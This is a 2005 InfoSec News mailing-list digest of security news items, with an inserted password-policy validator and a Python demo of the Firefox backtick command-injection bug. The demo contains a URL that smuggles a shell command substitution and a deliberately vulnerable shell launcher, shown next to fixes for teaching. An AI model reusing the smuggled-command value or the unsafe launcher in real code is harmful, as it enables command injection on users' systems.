As with all Dojo courses, to ensure that each student gets individual training from the instructors in the hands-on labs, class size will be limited to ten students per course. Each course is one day, and features practical exercises to help maximize knowledge retention.

Dojo registration will be available shortly under the "DOJO" tab on http://pacsec.jp along with expanded course information.

CanSecWest/core06 final dates: April 5-7 2006
Early Discount Registration is on-line at: http://cansecwest.com/register.html

Dojo/Vancouver dates: April 3-5 2006
Dojo/Vancouver Registration is not available yet.

cheers,
--dr

--
World Security Pros. Cutting Edge Training, Tools, and Techniques
Tokyo, Japan November 14-16 2005 http://pacsec.jp
pgpkey http://dragos.com/ kyxpgp

From isn at c4i.org Mon Sep 26 00:06:22 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 26 00:12:16 2005
Subject: [ISN] Surviving Rita: A tale of two data centers
Message-ID:

http://www.computerworld.com/securitytopics/security/recovery/story/0,10801,104940,00.html

By Todd R. Weiss
SEPTEMBER 24, 2005
COMPUTERWORLD

For the second hurricane in a row, New Orleans-based Web hosting vendor and Internet domain name registrar DirectNIC managed to stay up and running overnight as Hurricane Rita pounded the Gulf Coast before coming ashore early this morning.

Sigmund Solares, CEO of Intercosmos Media Group Inc., which owns DirectNIC, rode out Hurricane Rita in New Orleans last night and was busy assessing damage this morning.

Solares said his company, located on the 10th floor of a downtown New Orleans office building, was still dealing with broken windows and other damage left from Katrina, which plowed through the area Aug. 29. During that storm - and despite the massive flooding in much of New Orleans that followed - DirectNIC's operations continued uninterrupted because it had an emergency generator and an adequate fuel supply, he said. DirectNIC has approximately 800 hosted servers.

"We definitely got hurt by Katrina and we still have a ways to go [to get completely cleaned up] but we remained open the whole time," Solares said.

Even as Rita's strong winds brushed by last night, ripping tin pieces from neighboring structures and hurtling them at DirectNIC's building, Solares said he and his four team members were much less worried than when Katrina struck.

"It's still windy outside," he said this morning. "It's still gusty. [But] right now, we are feeling much better than at any time during Katrina."

Solares said he got a good night's sleep inside an internal office in the building, where he was able to get away from the howling winds outside.

The building continued to have electricity until 7:59 a.m. - more than four hours after the storm struck near the Louisiana-Texas border. The power went out then, and battery backups kicked on instantaneously, followed by a backup emergency generator, he said. The outage only lasted 11 minutes, however, and the company's servers remained up and running.
Looking outside, Solares said damage to neighboring buildings doesn't look as bad as when Katrina hit. Floodwaters didn't reach his building during the last storm, nor did they do so this time.

"With Katrina, when the levees broke, I could see the flooding a half a block away," he said. "I'm looking where there was flooding [before] and I don't see any water there right now."

In other parts of the city, particularly the Ninth Ward, floodwaters cascaded over newly-repaired levee walls yesterday, causing more problems in low-lying areas.

During Katrina, and again last night, DirectNIC's employees had to build a makeshift levee of their own. Rainwater began entering through the ceiling from broken windows on the floor above, Solares said, forcing him and his staff to use mops, a wet-dry vacuum machine and bundles of promotional T-shirts to create what he called the company's own "levee system" to keep water away from servers and other electronic gear.

Those same methods came in handy again last night, he said, since building repairs have not yet been made. Before Rita drew near, Solares and his crew installed plywood over the open windows and used sealant and tarps, hoping to keep out as much rain as possible. The makeshift repairs helped, he said.

Earlier this week, as Rita swirled in the Gulf of Mexico as a dangerous category 5 storm, Solares called a competing Web hosting vendor in Houston, EV1Servers.net, and offered help in case Rita hit Houston dead-on.

"For us, there's a lot we can do," Solares said. "It's not much effort for us to help people get back up and running." DirectNIC has extra space and capacity for servers and can make that space available to others in an emergency, he said.

"We're lucky that we've always saved for a rainy day and that we're able to help our employees and try to help other people, even though it's a very tough time for us overall," Solares said. "It's also good for morale for our employees to see us helping other people in need."
In Houston, Robert Marsh, the CEO of EV1Servers.net, said early today that because Hurricane Rita tracked farther toward the east, away from Houston, the city was spared the storm's worst effects (see "Update: As Rita drew near, Web hosting vendor prepared" [1]). The highest wind gusts were in the 50-mph-to-60-mph range, far lower than the 120 mph winds expected at one point. By this morning, only an inch of rain had fallen in the area where EV1's data centers are located, he said.

"In this instance, we were very fortunate not to have received the worst," he said.

Overnight, the company switched over to its emergency generators after some nearby power transformers blew up. EV1 plans to return to utility power sometime today after stable power flow is maintained for at least five hours, he said.

About 25 EV1 employees stayed overnight inside the company's offices and two data centers to maintain services for customers. The company had also sent seven Web technicians to a hotel in Wichita, Kan. to remotely handle customer trouble tickets had its main data centers been knocked out by the storm.

"Our trouble ticket load is essentially back to normal at this time," Marsh said today. "If the storm continues to clear, we hope to bring our people back from Wichita as early as Sunday night."

[1] http://www.computerworld.com/securitytopics/security/recovery/story/0,10801,104892,00.html

From isn at c4i.org Mon Sep 26 00:03:36 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 26 00:12:39 2005
Subject: [ISN] Ministry halts online service on hacking fears
Message-ID:

http://joongangdaily.joins.com/200509/23/200509232253101239900090609061.html

By Seo Ji-eun
September 24, 2005

The government service of issuing copies of civil documents online will be temporarily suspended due to security problems.
The Ministry of Government Administration and Home Affairs said yesterday that it would temporarily halt the service until it seals security loopholes that have enabled hackers to invade its Web site (www.egov.co.kr) and forge civil documents such as the residence registry.

"It has become common knowledge that documents issued on the Internet could be forged, thus opening doors for some people to make ill use of them when submitting documents to financial agencies," Minister of Government Administration Oh Young-kyo said in a National Assembly special audit session.

As of yesterday, the Web site stopped issuing 21 kinds of civil documents, including resident, land, construction and military registrations. About 20,000 documents have been issued since the service was launched in September 2003.

The service's suspension is thought likely to cause a great deal of inconvenience to the disabled or those households whose family members are too busy to visit government offices. An official from the Administration Ministry said it would take about a month to completely establish a hacking-prevention system.

Earlier in the day, Representative Kwon Oh-eul of the opposition Grand National Party demonstrated at the National Assembly how easy it is to forge documents downloaded from the Web site the government has been touting as part of an ambitious digital venture project.

Mr. Kwon pointed out that the hackers can forge and print documents directly from the Web site, instead of having to download them and modify the image files using high-quality copiers or scanners. Out of a total 2.57 million documents issued since the service started, only 0.5 percent, or 13,000, underwent the hacking-prevention process of receiving security authorization, he said.

From isn at c4i.org Mon Sep 26 00:04:53 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 26 00:13:06 2005
Subject: [ISN] ACSAC in Tucson in Dec. - Registration now open!
Message-ID:

Forwarded from: ACSAC Announcement List

I'm writing to encourage you to look at the Advance Program for the Annual Computer Security Applications Conference (ACSAC) at http://www.acsac.org. I've been involved with ACSAC for many years. I think that this year's program offers practical solutions to cyber security problems. The conference is scheduled for December 5-9, 2005 at the Marriott University Park, Tucson, Arizona.

We have a new and exciting format this year. On Monday, December 5 we have a special workshop on Malicious Software (Prevention and Defense) plus tutorials on application security training, Common Criteria version 3, trust management, and defense against malicious software. We have extended the length of the technical program to three full days to bring new momentum into the conference; we added two more sessions for peer-reviewed technical papers to accommodate the fact that we received a record number of high-quality submissions, and we revised the technical track review-process to ensure that we accept technical papers with high practical impact.

This year we are offering more choices to attendees, while keeping tried and true features such as plenary talks, classic papers, works in progress, and panels: Tuesday-Thursday, December 6-8, we have forty-five peer reviewed papers on practical computer security; presentations of security case studies; a new type of session, called 'technology blitz', is designed to offer rapid-fire introductions to emerging and mature security technologies and their applications; classic papers on the foundations of computer security, including David Bell reprising his Bell-LaPadula model; works in progress -- quick updates on ongoing projects; and Distinguished Practitioner Brian Snow and Invited Essayist Mary Ellen Zurko.

On Friday, December 9 we have tutorials on analysis of large scale network data, security policy modeling, securing web service applications, and mobile security issues.

ACSAC has changed where its web page is hosted. We have to rebuild our postal and email lists. Even if you have signed up previously, please go to http://www.acsac.org/list/ so that you can receive up-to-date information. Because we're rebuilding the lists, for a short while, you may receive more than one message about ACSAC. We apologize for the inconvenience.

-=-

You can help ACSAC reach people who might benefit from this information. Feel free to forward this message with a personal note to your friends and colleagues. They can sign up at the above URL.

ACSAC is sponsored by Applied Computer Security Associates, a not-for-profit all-volunteer Maryland corporation. Our postal address is 2906 Covington Road, Silver Spring, MD 20910-1206.

From isn at c4i.org Mon Sep 26 00:06:34 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 26 00:13:28 2005
Subject: [ISN] Troubled CardSystems to be sold
Message-ID:

http://www.networkworld.com/news/2005/092305-cardsystem.html

By Robert McMillan
IDG News Service
09/23/05

A Mountain View, Calif., electronic payment company plans to buy CardSystems, the transaction processing company which had data on 40 million customers compromised when hackers broke into its servers recently.

On Friday, CyberSource announced that it has signed a letter of intent to acquire the CardSystems assets, a transaction that could close by year's end. The deal gives CyberSource an opportunity to expand into new areas beyond the e-commerce transaction services that have built the 175 person company, said Bruce Frymire, a company spokesman.

"It brings a lot to CyberSource," he said. "It's a processing platform, which we have not had at this point. It also gives us retail point of sale processing."

CardSystems is used by 120,000 merchants to process more than $18 billion worth of transactions annually, Frymire said.
Online thieves were able to break into CardSystems' Tucson, Ariz., operations center and steal credit card information from the company's servers. The intrusion, which was disclosed in June, was detected after fraudulent charges began appearing on some of the stolen accounts. CardSystems' CEO John Perry has since admitted that the stolen records were improperly kept, and his company's business has taken a hit following the disclosure.

Both American Express and Visa U.S.A. have said that they intend to sever their relationship with CardSystems by the end of October. Whether or not the planned CyberSource acquisition will affect these defections may be a factor in the deal.

"Certainly that would be a matter of serious interest to us," Frymire said of the impending departures. CardSystems and CyberSource are working to ensure that merchants experience no disruption of service, he added.

CyberSource says the transaction is subject to further due diligence and may also be subject to regulatory approval. Frymire would not say how much CyberSource expected to pay for the privately held Atlanta company.

From isn at c4i.org Tue Sep 27 02:10:15 2005
From: isn at c4i.org (InfoSec News)
Date: Tue Sep 27 02:36:27 2005
Subject: [ISN] FAA air-traffic systems lack cyberprotections, GAO finds
Message-ID:

Forwarded from: William Knowles

http://www.gcn.com/vol1_no1/daily-updates/37127-1.html

By Rob Thormeyer
GCN Staff
09/26/05

Air-traffic control systems operated by the Federal Aviation Administration contain significant cybersecurity weaknesses and are vulnerable to attack, according to a recent report [1] from the Government Accountability Office. In the report, GAO concluded that the agency has not completely implemented information security programs that protect its systems from cyberattack.
"FAA has made progress in implementing information security for its air traffic control systems by establishing an agencywide information security program and addressing many of its previously identified security weaknesses; however, it still has significant weaknesses that threaten the integrity, confidentiality and availability of its systems - including weaknesses in controls that are designed to prevent, limit and detect access to those systems," the report said.

FAA officials admit the weaknesses exist, but contend that because parts of their systems are custom-built with older equipment, special-purpose operating systems and proprietary communication interfaces, chances for unauthorized access are limited, according to the report.

"Nevertheless, the proprietary features of these systems do not protect them from attack by disgruntled current or former employees who understand these features, or from more sophisticated hackers," the report added.

GAO recommended that the agency address the following weaknesses: outdated security plans, inadequate security awareness training, inadequate system testing and evaluation programs, limited security incident-detection capabilities and shortcomings in providing service continuity for disruptions in operations.

In response, FAA officials said they will consider the recommendations, but also stated that the report is not indicative of the agency's security systems.

Meanwhile, Rep. Tom Davis (R-Va.), who chairs the House Government Reform Committee that asked for the report, said FAA must address the recommendations. "Given the ever-evolving nature of cyberthreats and the thought of someone with malicious intent accessing FAA's IT systems, complacency is not an option," he said.

[1] http://www.gao.gov/new.items/d05712.pdf

*==============================================================*
"Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred M. Gray, USMC
================================================================
C4I.org - Computer Security, & Intelligence - http://www.c4i.org
*==============================================================*

From isn at c4i.org Tue Sep 27 02:10:42 2005
From: isn at c4i.org (InfoSec News)
Date: Tue Sep 27 02:36:50 2005
Subject: [ISN] Oracle CEO Touts Security Plans
Message-ID:

Forwarded from: security curmudgeon

: http://www.internetnews.com/bus-news/article.php/3550651
:
: By David Needle
: September 21, 2005
:
: He tweaked Microsoft's Bill Gates for once saying his company was going
: to devote special focus to security for the month of February. "Our
: first client was the CIA, and our second client was the National
: Security Agency. That was 25 years ago. We've been working on security
: since day one," said Ellison. He further claimed the last time an Oracle
: database was broken into was 15 years ago, versus the 45 minutes he said
: it took for someone to break into Microsoft's first version of its
: Passport online ordering system.

Well isn't this a doozy of a quote. This screams a) pure ignorance or b) very crafty wording designed to evade any criticism.

"last time an Oracle database was broken into was 15 years ago, vs the 45 minutes he said it took for someone to break into Microsoft's first version of its Passport online ordering system."

How do *you* read this quote?

1. Oracle database, as in their software, meaning installed anywhere
2. Oracle database, as in a database run by Oracle Corporation
3. Oracle database, as in a consumer service like MS Passport is (?!)
4. other?

Depending on how you read this, the reply will obviously change.

1. Hacker logs onto FWP hunter database, but no information stolen
http://www.bozemandailychronicle.com/articles/2005/06/29/news/02fwp.txt

"Luckily, Aasheim said, the agency's databases use Oracle software, which compresses information into a code that is not visible to hackers as readable text."

(Yes yes, horrible quote as far as the 'readable text' part, but still proves the point..)

Further, not that DNS is necessarily proof, we all know that many places name machines based on the application it runs:
http://www.zone-h.org/en/search/what=oracle/

05/24/2005: http://oracle.usgovbank.us
05/02/2005: http://oracle.riverblues.co.za/~sacx/image/ath.htm
02/27/2005: http://www.oracle-on-linux.com
01/31/2005: http://entrysoft.oracle.priorweb.be
01/17/2005: http://oracle.rensreinders.nl
11/18/2004: http://campus.pincn.com/clientpages/2004/oracle/index.html
06/08/2004: http://www.oracle.worldzonepro.com
12/19/2003: http://oracle.mylxhq.com
12/14/2003: http://www.oracle-pa.com.br
12/04/2003: http://www.oracle.berndpross.de
10/21/2003: http://www.oracle-dba.fr.pl
11/08/2002: http://oracle.ssnet.co.jp
10/29/2002: http://oracle.4click.com.ua
10/23/2002: http://www.oracle.ksu.edu
07/18/2002: http://www.oracle.net
06/27/2002: http://oracle.net
06/27/2002: http://www.oracle.net
06/17/2002: http://www.oracle-ovation.com
04/23/2002: http://partner.oracle.co.kr
06/27/2001: http://www.oracle.au.edu

2. A database run by Oracle, not hacked in last 15 years (so it was hacked 15 years ago)? But this doesn't jibe given the wording above:

"He further claimed the last time an Oracle database was broken into was 15 years ago, versus the 45 minutes he said it took for someone to break into Microsoft's first version of its Passport online ordering system."

This wording implies Ellison is directly comparing an Oracle product to a Microsoft service? If so, he is comparing a database running on the Oracle network, protected by multiple layers of security (presumably), to a public facing, publicly accessible Microsoft service. Apples and oranges Ellison.

3. Comparing Oracle a product, to Microsoft Passport service? Apples and oranges Ellison.

So, would anyone at Oracle like to back-pedal and try to explain this comment?
From isn at c4i.org Tue Sep 27 02:09:46 2005
From: isn at c4i.org (InfoSec News)
Date: Tue Sep 27 02:37:53 2005
Subject: [ISN] Information security standards highlighted after Tech Fest
Message-ID:

http://www.antiguasun.com/paper/?as=view&sun=100517108809262005&an=495409096609262005&ac=Local

September 26 2005

Emerging from the excitement of the Tech Fest 2005 and in preparation for World Standards Day (WSD) on 14 Oct., the Antigua & Barbuda Bureau of Standards (ABBS) would like to highlight the following excerpt as a timely tool for the information society, in keeping with the 2005 WSD theme - "Standards for a safer world".

For most business information, security may be essential to maintain competitive edge, cash flow, profitability, legal compliance and commercial image. But many businesses and most non-business organisations may hold information as their only asset. An absence of information security may threaten their integrity and therefore their very existence.

The 2002 Computer Crime and Security Survey of 503 computer security practitioners in the United States (conducted by the Computer Security Institute with the participation of the San Francisco FBI Computer Intrusion Squad) indicated that the threat from computer crime and other information security breaches continues unabated - and that the financial toll is mounting. According to the survey's findings, 90 per cent of the respondents detected computer security breaches within the 12 months covered by the survey, 80 per cent acknowledged financial losses due to computer breaches, and 46 per cent (223 respondents) reported their resulting financial losses as totalling US$455,848,000.
From isn at c4i.org Tue Sep 27 02:10:00 2005
From: isn at c4i.org (InfoSec News)
Date: Tue Sep 27 02:38:26 2005
Subject: [ISN] Password rule change tightens account security
Message-ID:

http://www.spectatornews.com/media/paper218/news/2005/09/26/CampusNews/Password.Rule.Change.Tightens.Account.Security-998087.shtml

By Nathaniel Shuda
September 26, 2005

With technology constantly evolving, regulating access to computer-related systems and services with passwords has become widespread. But if a person uses a simple password, it could be very easy for someone to hack into his or her system, especially with the use of password-cracking software designed to seek out patterns in passwords, said Chip Eckardt of Learning and Technology Services.

It is for this reason that LTS, along with the university, will require students and faculty to change their passwords to fit criteria that will make their accounts less susceptible to intrusion. The switch will begin Nov. 1.

More hackers are surfacing all the time, and accounts already have been compromised in several cases because of easy access to computer accounts, Eckardt said.

"We've even had Mac boxes get hacked," he said. "That's been real unusual because ... when you have something like Windows, (which) everybody goes after, it's a common target. But we're even seeing attacks in areas where we've never seen them before."

The LTS office plans to send three reminder messages via e-mail to warn users of the change: one informing all university computer users of the change, as well as reminders 10 and three days before current passwords expire. Users who recently have changed their passwords will not have to perform the switch until their new passwords expire in a year, Eckardt said. Those who do not change their password by the time it expires will be prompted the next time they log in and won't be allowed to connect to the system without first changing their password.
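The rules LTS lists at the end of this article (at least eight characters, characters from three of four categories, and no significant portion of the account name or full name) are the kind of policy a login system has to check mechanically, and the third rule is the one that is usually implemented loosely. The validator below is an added example, not code from the university or the article: the three rules are the article's, but the way names are split into tokens and the three-character threshold for what counts as a "significant portion" are assumptions made here, since the article does not define that term. The account name and candidate passwords in the sample run are constructed.

```python
import re
import string

MIN_LENGTH = 8      # "at least eight characters in length"
MIN_CLASSES = 3     # "three of the following four categories"
NAME_PART_LEN = 3   # assumption: a "significant portion" of a name is any
                    # name token of three or more characters (the article
                    # does not define the term)


def character_classes(password):
    """Return the set of character categories present in the password.

    The four categories follow the policy text: ASCII upper case, ASCII
    lower case, base-10 digits, and everything else (the policy's
    "non-alphabetic" category, i.e. symbols such as $, # or %)."""
    classes = set()
    for ch in password:
        if ch in string.ascii_uppercase:
            classes.add("upper")
        elif ch in string.ascii_lowercase:
            classes.add("lower")
        elif ch in string.digits:
            classes.add("digit")
        else:
            classes.add("symbol")
    return classes


def name_tokens(account_name, full_name):
    """Split the account name and full name on whitespace and common
    separators, keeping tokens long enough to count as a 'significant
    portion' (assumption: NAME_PART_LEN characters), lower-cased."""
    raw = re.split(r"[\s,.\-_#@]+", f"{account_name} {full_name}")
    return [tok.lower() for tok in raw if len(tok) >= NAME_PART_LEN]


def contains_name(password, account_name, full_name):
    """True if any name token appears inside the password, ignoring case."""
    lowered = password.lower()
    return any(tok in lowered for tok in name_tokens(account_name, full_name))


def check_password(password, account_name, full_name=""):
    """Return the list of policy violations; an empty list means the
    password satisfies all three rules."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("shorter than %d characters" % MIN_LENGTH)
    if len(character_classes(password)) < MIN_CLASSES:
        problems.append("uses fewer than %d of the 4 character categories" % MIN_CLASSES)
    if contains_name(password, account_name, full_name):
        problems.append("contains part of the account name or full name")
    return problems


if __name__ == "__main__":
    # Constructed sample account and candidates, not data from the article.
    account, full = "jdoe", "Jane Doe"
    for candidate in ("Tr0ub4dor&3", "password", "Doe2005!x", "Ab1!"):
        verdict = check_password(candidate, account, full) or ["ok"]
        print("%-12s %s" % (candidate, "; ".join(verdict)))
```

Note that the name check is case-insensitive and matches substrings, so "Doe2005!x" fails even though it satisfies the length and category rules; a check that only compared the whole account name would let it through.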
If users forget their passwords, Eckardt said, they can visit a Web site LTS will create to reset them.

The new requirements, however, have some students worried about accessing the university's computer system.

"I think it's a good idea, if you could remember your password," freshman Meghan Hamre said. "There's no way I could remember that kind of (password), especially eight (characters) long."

Eckardt recommended using a password that has a personal meaning, but not something hackers could easily guess. He said Eau Claire's change precedes a possible UW System-wide password policy.

"I know the UW System is looking at passing a statewide policy on this, and ours will comply with theirs, but their policy's probably not going to hit for another year," he said. "We're trying to be proactive."

-=-

Valid passwords will have to meet these minimum requirements:

* Must be at least eight characters in length
* Must contain characters from three of the following four categories:
  - English uppercase characters (A through Z)
  - English lowercase characters (a through z)
  - Base 10 digits (0 through 9)
  - Non-alphabetic characters (for example, $, # or %)
* Cannot contain significant portions of the user's account name or full name

From isn at c4i.org Tue Sep 27 02:11:05 2005
From: isn at c4i.org (InfoSec News)
Date: Tue Sep 27 02:38:59 2005
Subject: [ISN] Linux Security Week - September 26th 2005
Message-ID:

+---------------------------------------------------------------------+
|  LinuxSecurity.com                            Weekly Newsletter     |
|  September 26th, 2005                         Volume 6, Number 40n  |
|                                                                     |
|  Editorial Team:  Dave Wreski             dave@linuxsecurity.com    |
|                   Benjamin D. Thomas      ben@linuxsecurity.com     |
+---------------------------------------------------------------------+

Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines.
This week, perhaps the most interesting articles include "Protecting Linux against automated attackers," "Information Security Concepts Primer," and "Five common mistakes that Linux IT managers make."

---

LINUX ADVISORY WATCH

This week, advisories were released for turqstat, centericq, lm-sensors, kdebase, python, XFree86, Mailutils, Shorewall, mozilla, mod_ssl, clam, mod_ssl, Zebedee, umount, squid, and mod_ssl. The distributors include Debian, Fedora, Gentoo, and Red Hat.

http://www.linuxsecurity.com/content/view/120434/150/

---

Hacks From Pax: PHP Web Application Security
By: Pax Dickinson

Today on Hacks From Pax we'll be discussing PHP web application security. PHP is a great language for rapidly developing web applications, and is very friendly to beginning programmers, but some of its design can make it difficult to write web apps that are properly secure. We'll discuss some of the main security "gotchas" when developing PHP web applications, from proper user input sanitization to avoiding SQL injection vulnerabilities.

http://www.linuxsecurity.com/content/view/120043/49/

---

Network Server Monitoring With Nmap

Portscanning, for the uninitiated, involves sending connection requests to a remote host to determine what ports are open for connections and possibly what services they are exporting. Portscanning is the first step a hacker will take when attempting to penetrate your system, so you should be preemptively scanning your own servers and networks to discover vulnerabilities before someone unfriendly gets there first.

http://www.linuxsecurity.com/content/view/119864/150/

---

>> The Perfect Productivity Tools <<

WebMail, Groupware and LDAP Integration provide organizations with the ability to securely access corporate email from any computer, collaborate with co-workers and set-up comprehensive addressbooks to consistently keep employees organized and connected.

http://ads.linuxsecurity.com/cgi-bin/newad_redirect.pl?id=gdn05

--> Take advantage of the LinuxSecurity.com Quick Reference Card!
--> http://www.linuxsecurity.com/docs/QuickRefCard.pdf

+---------------------+
| Security News:      | <<-----[ Articles This Week ]----------
+---------------------+

* Firefox woes spread to Linux
  22nd, September, 2005

When I saw all the headlines this week about a new Symantec report contradicting popular perception that Firefox was the secure alternative to Microsoft Internet Explorer, the timing couldn't have been better. Just three days earlier I wrote this blog about Firefox surpassing Microsoft Internet Explorer in monthly vulnerabilities and a flood of angry comments followed in the talkback and Slashdot had another 500 plus comments.
http://www.linuxsecurity.com/content/view/120427

* Cisco security certifications changing
  20th, September, 2005

Cisco Systems Inc. is revamping its security professional-level certifications to better reflect the networking giant's emphasis on its Self-Defending Network strategy.
http://www.linuxsecurity.com/content/view/120415

* Protecting Linux against automated attackers
  22nd, September, 2005

As many systems administrators will tell you, attacks from automated login scripts specifically targeting common account names with weak passwords have become a substantial threat to system security, especially via SSH (a popular program that allows remote users to log in to a Linux computer and execute commands locally). Here are some common-sense rules to follow that can greatly improve security, as well as several scripts to cut down on the computing resources wasted by these attacks.
http://www.linuxsecurity.com/content/view/120428

* Underground without firewalls
  23rd, September, 2005

Deep underground somewhere in south-east England, security experts have built a data hosting center almost entirely based on open source operating systems.
http://www.linuxsecurity.com/content/view/120436

* Novell strengthens its security products
  20th, September, 2005

At Novell's Brainshare user conference in Barcelona last week, the software supplier said it had strengthened its identity and access management security products, Novell Identity & Access Management.
http://www.linuxsecurity.com/content/view/120413

* EnGarde Secure Linux 3.0 PR1
  21st, September, 2005

"Guardian Digital is shortly going to be announcing the next major release of its award-winning EnGarde Secure Linux platform, and we'd like to offer the engarde-users community a first-glimpse at this release. Within this new release, codenamed Rapier, you'll find: Linux 2.6 kernel featuring SELinux Mandatory Access Control; Guardian Digital Secure Network features free access to all system and security updates; support for new hardware, including 64-bit AMD architecture; web-based management of all functions...."
http://www.linuxsecurity.com/content/view/120420

* Firefox Command Line URL Shell Command Injection
  21st, September, 2005

Peter Zelezny has discovered a vulnerability in Firefox, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within backticks in the URL provided via the command line. This can e.g. be exploited to execute arbitrary shell commands by tricking a user into following a malicious link in an external application which uses Firefox as the default browser (e.g. the mail client Evolution on Red Hat Enterprise Linux 4).
http://www.linuxsecurity.com/content/view/120423

* Auditor: The security tool collection
  23rd, September, 2005

The Auditor security collection is a GPL-licensed live CD based on Knoppix, with more than 300 security software tools. Auditor gives you easy access to a broad range of tools in almost no time.
http://www.linuxsecurity.com/content/view/120439

* Are IT Departments Security Risks?
  19th, September, 2005

Workers are more likely to indulge in risky Internet behavior -- surfing to unknown or even suspicious sites, for example -- when they have an IT department behind them to clean up their mess, a recently released study claims.
http://www.linuxsecurity.com/content/view/120407

* Hackers thwart security by going small
  19th, September, 2005

Computer attackers are trying to circumvent improved defences in corporate networks by creating smaller worms and viruses that infect individual computers, says a report on Internet security to be released today.
http://www.linuxsecurity.com/content/view/120410

* ISS discusses its security procedures
  20th, September, 2005

Internet Security Systems Chairman, CEO and President Tom Noonan says customers increasingly are looking for security platforms that do two basic things: Let the good guys in and keep the bad guys out. He spoke with Network World's Editor in Chief John Dix and News Editor Bob Brown. Here is an edited transcript of Noonan's thoughts on a host of topics.
http://www.linuxsecurity.com/content/view/120414

* Passwords In Security
  21st, September, 2005

Breaking into corporate networks, and thereby corporate information, has never been easier. Why? Firstly, access to systems (usually Windows) at the desktop is universal. Secondly, most people, including techies, don't appear to know how to select adequately secure passwords.
http://www.linuxsecurity.com/content/view/120421

* Viruses not just a Windows issue
  21st, September, 2005

According to a report from antivirus company Kaspersky, Mozilla.org recently hosted Linux versions of the Mozilla browser and Thunderbird mail client that were infected with the Linux RST.b virus. The versions involved were the localised Korean releases, and they have now been removed. RST.b infects ELF executable files to insert a backdoor onto the victim's computer and automatically downloads exploit scripts from an Internet site.
http://www.linuxsecurity.com/content/view/120424

* Information Security Concepts Primer
  22nd, September, 2005

Information Security is such a broad discipline that it's easy to get lost in a single area and lose perspective. The discipline covers everything from how high to build the fence outside your business, all the way to how to harden a Windows 2003 server.
http://www.linuxsecurity.com/content/view/120431

* Five common mistakes that Linux IT managers make
  23rd, September, 2005

After seeing the same mistakes repeated by different IT managers over the years, I've noticed a pattern of common errors. Here are the five common mistakes, along with tips for avoiding them.
http://www.linuxsecurity.com/content/view/120437

* Name that worm plan looks to cut through chaos
  23rd, September, 2005

Zotob.E, Tpbot-A, Rbot.CBQ and IRCbot.worm: all names given to a single worm that wreaked havoc in Windows 2000 systems last month. Among the plethora of identifiers, perhaps the most useful--CME-540--didn't make an impact.
http://www.linuxsecurity.com/content/view/120438

* Protect Yourself Against Rogue Employees
  20th, September, 2005

You have problems. The annual report spreadsheet has disappeared from a server. A virus is loose in company e-mail. Someone has access to the network through some kind of back door. Those are big problems.
http://www.linuxsecurity.com/content/view/120416

------------------------------------------------------------------------
Distributed by: Guardian Digital, Inc.                LinuxSecurity.com

To unsubscribe email newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message.
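The "Firefox Command Line URL Shell Command Injection" item in the newsletter above describes a bug class rather than a Firefox quirk: the launcher is a shell script, a URL argument containing backticks reaches the shell without quoting, and the shell performs the command substitution before the browser ever starts. What follows is an added example, not Firefox's launcher script and not code from the newsletter. It reproduces the pattern with a stand-in "browser" (echo) driven from Python through /bin/sh, beside the two ways a wrapper avoids it: passing the URL as one argv element so no shell is involved, or quoting it with shlex.quote when a shell command line genuinely has to be built. The URL is constructed, a POSIX /bin/sh is assumed, and the only command the payload runs is a harmless echo.

```python
import shlex
import subprocess

# Constructed input: a URL carrying a backtick command substitution, the
# shape of the malicious link the advisory describes.  /bin/sh runs
# `echo INJECTED` and splices its output into the command line; a real
# payload would run something other than echo.
MALICIOUS_URL = "http://example.invalid/search/`echo INJECTED`"


def launch_vulnerable(url):
    """Stand-in for a wrapper script that builds the browser command line by
    pasting the URL into a string and handing it to /bin/sh.  An unquoted
    variable or an eval in a shell script has exactly this effect.  Returns
    what the 'browser' (here: echo) actually received as its argument."""
    command = "echo " + url
    done = subprocess.run(command, shell=True, capture_output=True,
                          text=True, check=True)
    return done.stdout.strip()


def launch_fixed(url):
    """Same launcher with the URL passed as a single argv element.  No shell
    is involved, so the URL reaches the program byte for byte."""
    done = subprocess.run(["echo", url], capture_output=True,
                          text=True, check=True)
    return done.stdout.strip()


def launch_quoted(url):
    """When a shell command line must be built (for example inside a shell
    wrapper), shlex.quote wraps the untrusted argument in single quotes so
    the shell treats backticks, $(...), ; and friends as plain text."""
    command = "echo " + shlex.quote(url)
    done = subprocess.run(command, shell=True, capture_output=True,
                          text=True, check=True)
    return done.stdout.strip()


def has_command_substitution(url):
    """Belt-and-braces check a wrapper can apply before calling out: a URL
    has no legitimate reason to contain either command-substitution syntax."""
    return "`" in url or "$(" in url


if __name__ == "__main__":
    print("vulnerable:", launch_vulnerable(MALICIOUS_URL))
    print("argv list: ", launch_fixed(MALICIOUS_URL))
    print("quoted:    ", launch_quoted(MALICIOUS_URL))
    print("flagged:   ", has_command_substitution(MALICIOUS_URL))
```

The vulnerable path hands the program a URL in which the backtick expression has already been replaced by the output of the injected command; both fixed paths hand it the URL exactly as written. The argv-list form is the one to prefer, since quoting is only as good as the discipline of every script that touches the argument afterwards.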
------------------------------------------------------------------------

From isn at c4i.org Tue Sep 27 02:09:33 2005
From: isn at c4i.org (InfoSec News)
Date: Tue Sep 27 02:41:19 2005
Subject: [ISN] Fortifying DOD's network defenses
Message-ID:

http://www.fcw.com/article90899-09-26-05

By Frank Tiboni
Sept. 26, 2005

Defense Department officials can implement a mixture of technologies and procedures to fortify the department's computer networks, but real protection requires designing a new generation of systems and security tools, a leading computer scientist said.

Eugene Spafford, a computer sciences professor at Purdue University who has testified before Congress on cybersecurity, questions whether it's possible to develop new systems without investing in long-term research.

Attacks on DOD computer networks are on the rise as adversaries attempt to bypass the United States' formidable defenses and launch attacks from the inside out, experts say.

Defending DOD's networks will require a combination of efforts, Spafford said. He outlined six steps DOD could take to strengthen the department's network defenses. They are:

* Buying systems based on security features rather than cost.
* Limiting access to systems.
* Removing systems from networks unless those systems are absolutely necessary.
* Restricting who can add hardware and software to networks.
* Requiring proper training and supervision for network managers and computer users.
* Establishing careful network-monitoring practices.

But Spafford said incremental changes will not strengthen existing networks and a whole new approach is needed.

